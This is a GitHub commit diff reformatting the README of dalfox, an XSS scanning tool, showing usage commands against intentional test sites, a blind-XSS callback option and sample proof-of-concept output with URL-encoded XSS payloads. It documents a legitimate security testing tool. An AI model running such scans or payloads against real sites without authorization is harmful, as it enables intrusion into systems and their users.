Skip to content

Commit 5244169

Browse files
hahwulhahwul
committed
Update README
1 parent a74f4ec commit 5244169

File tree

1 file changed

+17
-15
lines changed

1 file changed

+17
-15
lines changed

README.md

Lines changed: 17 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -90,22 +90,23 @@ More information? please read [Installation guide](https://dalfox.hahwul.com/doc
9090

9191
## Usage
9292
```
93-
dalfox [mode] [target] [flags]
93+
dalfox [mode] [target] [flags]
9494
```
9595

9696
Single target mode
97-
```plain
98-
▶ dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff -b https://hahwul.xss.ht
97+
```bash
98+
dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
99+
-b https://hahwul.xss.ht
99100
```
100101

101102
Multiple target mode from file
102-
```plain
103-
dalfox file urls_file --custom-payload ./mypayloads.txt
103+
```bash
104+
dalfox file urls_file --custom-payload ./mypayloads.txt
104105
```
105106

106107
Pipeline mode
107-
```plain
108-
cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"
108+
```bash
109+
cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"
109110
```
110111

111112
Other tips, See [wiki](https://github.com/hahwul/dalfox/wiki) for detailed instructions!
@@ -129,11 +130,12 @@ Format
129130

130131
Why is there a gap?
131132
It is a method to make it easier to parse only the poc code through cut etc. For example, you can do this.
132-
```shell
133-
▶ dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff | cut -d " " -f 2 > output
134-
▶ cat output
135-
http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
136-
http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E
133+
```bash
134+
dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
135+
| cut -d " " -f 2 > output
136+
cat output
137+
# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
138+
# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E
137139
```
138140

139141
## In the code
@@ -163,9 +165,9 @@ func main() {
163165
}
164166
```
165167

166-
```
167-
$ go build -o xssapp ; ./xssapp
168-
[] [{V GET https://xss-game.appspot.com/level1/frame?query=%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dprint%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E}] 2.618998247s 2021-07-11 10:59:26.508483153 +0900 KST m=+0.000794230 2021-07-11 10:59:29.127481217 +0900 KST m=+2.619792477}
168+
```bash
169+
go build -o xssapp ; ./xssapp
170+
# [] [{V GET https://xss-game.appspot.com/level1/frame?query=%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dprint%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E}] 2.618998247s 2021-07-11 10:59:26.508483153 +0900 KST m=+0.000794230 2021-07-11 10:59:29.127481217 +0900 KST m=+2.619792477}
169171
```
170172

171173
## Screenshots

0 commit comments

Comments
 (0)